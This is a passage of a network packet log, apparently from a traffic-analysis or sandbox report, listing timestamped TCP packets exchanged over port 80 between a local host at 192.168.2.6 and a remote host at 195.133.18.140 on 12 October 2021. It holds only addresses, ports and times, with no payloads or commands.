Oct 12, 2021 12:35:37.882494926 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882497072 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882515907 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882519960 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882540941 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882541895 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882561922 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882586002 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882587910 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882600069 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882606030 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882616997 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882627010 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882636070 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882647991 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882657051 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882671118 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882694006 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882695913 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882714033 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882726908 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882730961 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882734060 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882755041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882767916 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882776976 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882797003 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882798910 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882817984 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882821083 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882843018 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882863998 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882872105 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882885933 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882888079 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882905006 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882926941 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882936954 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882951021 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882956028 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882972002 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882986069 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.882994890 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.882999897 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883016109 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883021116 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883038044 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883043051 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883060932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883061886 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883081913 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883095980 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883102894 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883172035 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883178949 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883196115 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883198977 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883222103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883243084 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883265018 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883282900 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883287907 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883301020 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883310080 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883331060 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883333921 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883358002 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883382082 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883398056 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883405924 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883409977 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883414030 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883435965 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883445978 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883456945 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883476973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883480072 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883497000 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883517027 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883517027 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883538961 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883539915 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883563995 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883565903 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883583069 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883585930 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883604050 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883619070 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883625984 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883635044 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883657932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883661032 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883677959 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883690119 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883697033 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883718014 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883734941 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883740902 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883761883 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883765936 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883785009 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883807898 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883810043 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883829117 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883837938 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883851051 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883869886 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883872986 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883896112 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883902073 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883912086 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883934021 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883954048 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883955002 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.883975029 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.883980036 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884001017 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884006977 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884026051 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884036064 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884048939 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884069920 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884073973 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884092093 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884094000 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884113073 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884120941 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884134054 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884146929 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884157896 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884176970 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884186029 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884201050 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884206057 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884226084 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884228945 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884247065 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884259939 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884270906 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884293079 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884295940 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884314060 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884314060 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884335995 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884356976 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884363890 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884378910 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884402037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884406090 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884424925 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884430885 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884448051 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884468079 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884470940 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884491920 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884510040 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884512901 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884531975 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884535074 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884557009 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884567976 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884577990 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884586096 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884599924 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884608984 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884624004 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884632111 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884646893 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884666920 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884673119 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884680033 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884687901 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884711027 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.884717941 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884737015 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.884865046 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.896533012 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.897154093 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.910815954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.910851955 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.910875082 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.910893917 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.910908937 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.910968065 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.911005020 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911026955 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911051989 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911071062 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911081076 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.911093950 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911134005 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911147118 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.911150932 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.911156893 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911179066 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911206007 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911206007 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.911228895 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911251068 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911269903 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.911273003 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911297083 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911297083 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.911319017 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911329985 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.911344051 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911361933 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.911366940 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911380053 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.911393881 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911406994 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.911417961 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911441088 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911449909 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.911463976 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911488056 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911505938 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.911506891 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.911566973 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.911667109 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.936458111 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:37.936589003 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:37.936908007 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.665185928 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.691800117 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.691836119 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.691858053 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.691879034 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.691903114 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.691925049 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.691962004 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.691989899 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692015886 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692033052 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.692039967 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692059040 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692081928 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692085981 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.692105055 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692130089 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692151070 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692173958 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692173958 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.692197084 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692219973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692248106 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692272902 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692297935 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692298889 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.692316055 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.692322016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692353010 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692374945 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.692390919 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.692810059 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.718105078 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718166113 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718188047 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718205929 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718224049 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718241930 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718261003 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718280077 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718297958 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718316078 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718333960 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718352079 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718372107 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718389988 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718408108 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718426943 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718446016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718463898 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718481064 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718494892 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718513012 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718532085 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718550920 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718569040 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718588114 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718605995 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718625069 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718643904 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718662024 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718681097 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718698978 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718717098 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718734980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718753099 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718771935 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718791008 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718810081 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718828917 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718847036 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718866110 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718883991 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718897104 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718913078 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718929052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.718947887 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.720376968 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.746383905 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746422052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746457100 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746481895 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746505976 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746531010 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746555090 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746578932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746603012 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746620893 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746640921 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746665001 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746687889 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746695995 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.746709108 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746731997 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746742010 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.746753931 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746778965 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746802092 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746805906 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.746824026 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746848106 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746869087 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746872902 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.746897936 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746918917 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746923923 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:38.746937037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746959925 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.746979952 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:38.747001886 CEST	80	49749	195.133.18.140	192.168.2.6
